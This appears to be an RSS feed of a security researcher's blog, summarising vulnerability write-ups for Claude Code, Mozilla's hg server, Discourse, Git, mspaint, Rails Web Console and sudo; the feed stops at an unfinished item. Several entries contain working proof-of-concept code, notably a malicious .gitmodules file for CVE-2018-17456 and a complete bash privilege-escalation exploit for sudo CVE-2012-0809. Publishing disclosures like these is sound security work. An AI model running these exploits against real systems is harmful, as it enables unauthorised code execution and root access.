<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Recipes on 0day.click</title>
    <link>https://0day.click/recipe/</link>
    <description>Recent content in Recipes on 0day.click</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Tue, 12 May 2026 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://0day.click/recipe/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Claude Code RCE: Exploiting Deeplink Handlers via Settings Injection</title>
      <link>https://0day.click/recipe/2026-05-12-cc-rce/</link>
      <pubDate>Tue, 12 May 2026 00:00:00 +0000</pubDate>
      <guid>https://0day.click/recipe/2026-05-12-cc-rce/</guid>
      <description>&lt;p&gt;Of course I took a peek at the Claude Code source 🙈.&lt;/p&gt;&#xA;&lt;p&gt;What I found was a very entertaining vulnerability which is now&#xA;fixed since Claude Code version 2.1.118.&lt;/p&gt;&#xA;&lt;p&gt;Just wading through the massive codebase manually wasn&amp;rsquo;t really a&#xA;feasible approach. So took an army of AI Agents to&amp;hellip;. no wait&#xA;actually I did not do that, the following was all manual work. :P&lt;/p&gt;&#xA;&lt;p&gt;I started by looking at different configuration options and tried to see&#xA;what&amp;rsquo;s actually &amp;ldquo;useful&amp;rdquo; from an attacker&amp;rsquo;s perspective. On the way,&#xA;in &lt;code&gt;main.tsx&lt;/code&gt; I came across &lt;code&gt;eagerLoadSettings&lt;/code&gt;, it eagerly loads settings,&#xA;obviously:&lt;/p&gt;</description>
    </item>
    <item>
      <title>RCE via LDAP truncation on hg.mozilla.org</title>
      <link>https://0day.click/recipe/pash/</link>
      <pubDate>Sat, 03 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://0day.click/recipe/pash/</guid>
      <description>&lt;p&gt;Given my interest in SCM and CI systems I was a little keen to see how this is done at Mozilla as part of their &lt;a href=&#34;https://hackerone.com/mozilla_critical_services&#34;&gt;bug bounty program&lt;/a&gt;.&#xA;Thanks to &lt;a href=&#34;https://social.security.plumbing/@freddy&#34;&gt;freddy&lt;/a&gt; I was granted &lt;a href=&#34;https://www.mozilla.org/en-US/about/governance/policies/commit/access-policy/&#34;&gt;Level 1 access&lt;/a&gt; to Mozilla&amp;rsquo;s SCM at &lt;code&gt;hg.mozilla.org&lt;/code&gt; in late 2022. As Mozilla is a pretty transparent company I found the &lt;a href=&#34;https://hg.mozilla.org/hgcustom/version-control-tools/&#34;&gt;version-control-tools&lt;/a&gt; repository which contains the code and configuration behind &lt;code&gt;hg.mozilla.org&lt;/code&gt;.&lt;/p&gt;&#xA;&lt;p&gt;I spent a couple of hours to a very few days looking at this code, setting up a simplified test system, and popping shells on the infrastructure around Christmas 2022. In this post I&amp;rsquo;ll outline one of two authenticated RCE flaws I identified and reported to Mozilla on the 26th of December in 2022.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Discourse SNS webhook RCE</title>
      <link>https://0day.click/recipe/discourse-sns-rce/</link>
      <pubDate>Sat, 23 Oct 2021 00:00:00 +0000</pubDate>
      <guid>https://0day.click/recipe/discourse-sns-rce/</guid>
      <description>&lt;p&gt;I was staring at &lt;a href=&#34;https://github.com/discourse/discourse/blob/1472e47aae5bfdfb6fd9abfe89beb186c751f514/app/jobs/regular/confirm_sns_subscription.rb#L17&#34;&gt;this part&lt;/a&gt; of the code for way too long already:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-ruby&#34; data-lang=&#34;ruby&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;module&lt;/span&gt; Jobs&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &lt;span style=&#34;color:#66d9ef&#34;&gt;class&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;ConfirmSnsSubscription&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;&amp;lt;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;::&lt;/span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;Jobs&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;::&lt;/span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;Base&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    sidekiq_options &lt;span style=&#34;color:#66d9ef&#34;&gt;retry&lt;/span&gt;: &lt;span style=&#34;color:#66d9ef&#34;&gt;false&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;def&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;execute&lt;/span&gt;(args)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;      &lt;span style=&#34;color:#66d9ef&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;unless&lt;/span&gt; raw &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; args&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;:raw&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;].&lt;/span&gt;presence&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;      &lt;span style=&#34;color:#66d9ef&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;unless&lt;/span&gt; json &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; args&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;:json&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;].&lt;/span&gt;presence&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;      &lt;span style=&#34;color:#66d9ef&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;unless&lt;/span&gt; subscribe_url &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; json&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;SubscribeURL&amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;].&lt;/span&gt;presence&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;      require &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;aws-sdk-sns&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;      &lt;span style=&#34;color:#66d9ef&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;unless&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;Aws&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;::&lt;/span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;SNS&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;::&lt;/span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;MessageVerifier&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;new&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;authentic?(raw)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;      &lt;span style=&#34;color:#75715e&#34;&gt;# confirm subscription by visiting the URL&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;      open(subscribe_url)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;end&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &lt;span style=&#34;color:#66d9ef&#34;&gt;end&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;end&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The above code is an excerpt from &lt;a href=&#34;https://www.discourse.org/&#34;&gt;Discourse&lt;/a&gt;&amp;rsquo;s AWS notification webhook handler. This handler can be triggered without further authentication under &lt;code&gt;https://somedicourseinstance/webhooks/aws&lt;/code&gt;. In the above code &lt;code&gt;args[:raw]&lt;/code&gt; is the raw POST body and &lt;code&gt;args[:json]&lt;/code&gt; is the POST body but parsed as JSON.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Discourse themes OS Command Injection</title>
      <link>https://0day.click/recipe/2021-04-18-discourse-themes/</link>
      <pubDate>Sun, 18 Apr 2021 00:00:00 +0000</pubDate>
      <guid>https://0day.click/recipe/2021-04-18-discourse-themes/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://www.discourse.org/&#34;&gt;Discourse&lt;/a&gt; offers the possibility to install themes from remote Git repositories. Before &lt;a href=&#34;https://github.com/discourse/discourse/commit/94301854938a0b36dd64666fb7a7c8406544a781&#34;&gt;this commit&lt;/a&gt; it was possible to inject OS commands via a maliciously crafted theme which is pulled via Git.&lt;/p&gt;&#xA;&lt;p&gt;The root cause for the issue lay in the parsing of the &lt;a href=&#34;https://meta.discourse.org/t/introducing-discourse-compatibility-pinned-plugin-theme-versions-for-older-discourse-versions/156971&#34;&gt;&lt;code&gt;.discourse-compatibility&lt;/code&gt; file&lt;/a&gt;&#xA;which is a yaml file containing a mapping of the target discourse version and a git&#xA;version to be checked out for that specific discourse version.&lt;/p&gt;&#xA;&lt;p&gt;The version information is passed to&lt;/p&gt;</description>
    </item>
    <item>
      <title>Mosaic &#34;0day&#34;</title>
      <link>https://0day.click/recipe/m0s41c/</link>
      <pubDate>Fri, 04 Dec 2020 00:00:00 +0000</pubDate>
      <guid>https://0day.click/recipe/m0s41c/</guid>
      <description>&lt;p&gt;While attendig &lt;a href=&#34;https://warcon.pl&#34;&gt;WarCon&lt;/a&gt; in 2016&#xA;&lt;a href=&#34;https://twitter.com/teh_gerg&#34;&gt;greg&lt;/a&gt; and I sat together in .mario&amp;rsquo;s talk &lt;em&gt;My&#xA;Sweet Innocence Exposed - Eleven Reasons why we will all miss you, &amp;ldquo;e&amp;rdquo;&lt;/em&gt;, his&#xA;rants about MSIE reminded us of the fact that we both had the task of finding a&#xA;Mosaic 0day still on our agenda. So the evening after the talk we sat down&#xA;together and started approaching that goal.&lt;/p&gt;&#xA;&lt;p&gt;The latest version of Mosaic for Unix which can be found at&#xA;&lt;code&gt;ftp://ftp.ncsa.uiuc.edu/Mosaic/Unix/binaries/2.7b/&lt;/code&gt; is 2.7b, released&#xA;roughly 24 years ago. So we got the static binary for Linux and threw it in a&#xA;somewhat recent 32bit Ubuntu VM.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CVE-2018-17456</title>
      <link>https://0day.click/recipe/cve-2018-17456/</link>
      <pubDate>Tue, 16 Oct 2018 00:00:00 +0000</pubDate>
      <guid>https://0day.click/recipe/cve-2018-17456/</guid>
      <description>&lt;p&gt;I&amp;rsquo;ve gotten a couple of questions about exploitation for the&#xA;&lt;a href=&#34;https://marc.info/?l=git&amp;amp;m=153875888916397&amp;amp;w=2&#34;&gt;recent RCE&lt;/a&gt; in Git. So here we&#xA;go with some technical details.&lt;/p&gt;&#xA;&lt;h2 id=&#34;tldr&#34;&gt;TL;DR&lt;/h2&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://github.com/joernchen/poc-submodule&#34;&gt;Here&lt;/a&gt; is a PoC repository.&lt;/p&gt;&#xA;&lt;h2 id=&#34;exploitation&#34;&gt;Exploitation&lt;/h2&gt;&#xA;&lt;p&gt;The &lt;code&gt;.gitmodules&lt;/code&gt; file looks as follows:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-ini&#34; data-lang=&#34;ini&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;[submodule &amp;#34;x:x&amp;#34;]&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#x9;&lt;span style=&#34;color:#a6e22e&#34;&gt;path&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;x:x&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&#x9;url = -u./payload&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The actual command being injected is set by the url, &lt;code&gt;-u./payload&lt;/code&gt;&#xA;points the &lt;code&gt;upload-pack&lt;/code&gt; flag of git clone to the &lt;code&gt;payload&lt;/code&gt; shell&#xA;script. Note also the &lt;code&gt;:&lt;/code&gt; within the path, this part is needed to&#xA;actually get the &lt;code&gt;payload&lt;/code&gt; script executed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Paintbleed</title>
      <link>https://0day.click/recipe/paintbleed/</link>
      <pubDate>Tue, 14 Mar 2017 00:00:00 +0000</pubDate>
      <guid>https://0day.click/recipe/paintbleed/</guid>
      <description>&lt;h1 id=&#34;summary&#34;&gt;Summary&lt;/h1&gt;&#xA;&lt;p&gt;mspaint.exe does not properly verify Dib data from the clipboard. Therefore&#xA;we can craft some Dib data in the clipboard which e.g. suggests a size of&#xA;0x100 by 0x100 pixels and contains not more than the Dib header itself. So&#xA;the actual image data rendered by mspaint.exe is its own heap data =)&lt;/p&gt;&#xA;&lt;h1 id=&#34;poc&#34;&gt;PoC&lt;/h1&gt;&#xA;&lt;p&gt;Run the following code in PowerShell:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-powershell&#34; data-lang=&#34;powershell&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$bytes = &lt;span style=&#34;color:#ae81ff&#34;&gt;40&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;24&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;136&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;,&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;[&lt;span style=&#34;color:#66d9ef&#34;&gt;System.Windows.Forms.Clipboard&lt;/span&gt;]::SetData([&lt;span style=&#34;color:#66d9ef&#34;&gt;System.Windows.Forms.DataFormats&lt;/span&gt;]::Dib,[&lt;span style=&#34;color:#66d9ef&#34;&gt;System.IO.MemoryStream&lt;/span&gt;]::new($bytes))&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Afterwards open mspaint.exe and paste. The result should be the graphical&#xA;representation of some of mspaints.exe&amp;rsquo;s heap memory.&lt;/p&gt;</description>
    </item>
    <item>
      <title>WebConsole IP Whitelist bypass</title>
      <link>https://0day.click/recipe/2015-06-16-webconsole/</link>
      <pubDate>Tue, 16 Jun 2015 20:44:23 +0200</pubDate>
      <guid>https://0day.click/recipe/2015-06-16-webconsole/</guid>
      <description>&lt;p&gt;With the release of Ruby on Rails 4.2 the so called &lt;a href=&#34;https://github.com/rails/web-console&#34;&gt;Web Console&lt;/a&gt; was introduced.&lt;/p&gt;&#xA;&lt;p&gt;As the Web Console documentation states:&#xA;&lt;em&gt;Web Console is built explicitly for Rails 4.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;By default the Web Console is available in the Rails Development Environment and allows only the IPs &lt;code&gt;127.0.0.1&lt;/code&gt; and &lt;code&gt;::1&lt;/code&gt; to access the console in order to evaluate arbitrary Ruby statements for the purpose of debugging.&lt;/p&gt;&#xA;&lt;p&gt;However with Rails Versions 4.1 and 4.0 the Web Console built in IP whitelist is bypassable.&#xA;This is due to the fact that Web Console parses the &lt;code&gt;request.remote_ip&lt;/code&gt; to check if the IP is whitelisted with the Ruby class &lt;code&gt;IPAddr&lt;/code&gt;. The Rails stack prior to 4.2 when calculating &lt;code&gt;request.remote_ip&lt;/code&gt; uses &lt;a href=&#34;https://github.com/rails/rails/blob/4-1-stable/actionpack/lib/action_dispatch/middleware/remote_ip.rb#L31-38&#34;&gt;these regular expressions&lt;/a&gt; to strip out trusted Proxies from the HTTP Headers &lt;code&gt;X-Forwarded-For&lt;/code&gt; and &lt;code&gt;Client-IP&lt;/code&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CVE-2012-0809 Exploit</title>
      <link>https://0day.click/recipe/2014-04-28-sudo-expoit/</link>
      <pubDate>Mon, 28 Apr 2014 18:28:10 +0200</pubDate>
      <guid>https://0day.click/recipe/2014-04-28-sudo-expoit/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://gist.github.com/joernchen/618a8940894084102fe2&#34;&gt;Original gist&lt;/a&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/bin/bash&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;# CVE-2012-0809 exploit&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;# joernchen of Phenoelit&amp;#39;s version&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;# Payload to be executed goes to /tmp/a (might be a shell script)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;cd /tmp&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;-&amp;gt; Clearing ENV&amp;#39;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; i in &lt;span style=&#34;color:#e6db74&#34;&gt;`&lt;/span&gt;env |cut -f1 -d &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;=&amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;`&lt;/span&gt; ;&lt;span style=&#34;color:#66d9ef&#34;&gt;do&lt;/span&gt; unset $i;&lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;  &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;-&amp;gt; Creating symlink&amp;#39;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/bin/ln -s /usr/bin/sudo ./%134520134x%900&lt;span style=&#34;color:#ae81ff&#34;&gt;\$&lt;/span&gt;n&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;-&amp;gt; Setting ENV&amp;#39;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;export AAA&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;AAAA;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;export A;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; i in &lt;span style=&#34;color:#e6db74&#34;&gt;`&lt;/span&gt;/usr/bin/seq &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; 5000&lt;span style=&#34;color:#e6db74&#34;&gt;`&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;do&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;export A&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;$A&lt;span style=&#34;color:#e6db74&#34;&gt;`&lt;/span&gt;echo -n -e &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;\x24\x83\x05\x08&amp;#39;&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;`&lt;/span&gt;;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;-&amp;gt; Now a little Brute-Force&amp;#39;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;while&lt;/span&gt; true ; &lt;span style=&#34;color:#66d9ef&#34;&gt;do&lt;/span&gt; SUDO_ASKPASS&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;/tmp/a ./%134520134x%900&lt;span style=&#34;color:#ae81ff&#34;&gt;\$&lt;/span&gt;n -D9 -A id 2&amp;gt;/dev/null ; &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[[&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;$?&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;==&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;1&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;]]&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;then&lt;/span&gt; break ;&lt;span style=&#34;color:#66d9ef&#34;&gt;fi&lt;/span&gt;  ; &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;-&amp;gt; Cleaning up&amp;#39;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/bin/rm /tmp/%134520134x%900&lt;span style=&#34;color:#ae81ff&#34;&gt;\$&lt;/span&gt;n&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
    </item>
    <item>
      <title>GitHub RCE Writeup</title>
      <link>https://0day.click/recipe/2014-02-22-github/</link>
      <pubDate>Sat, 22 Feb 2014 17:17:50 +0100</pubDate>
      <guid>https://0day.click/recipe/2014-02-22-github/</guid>
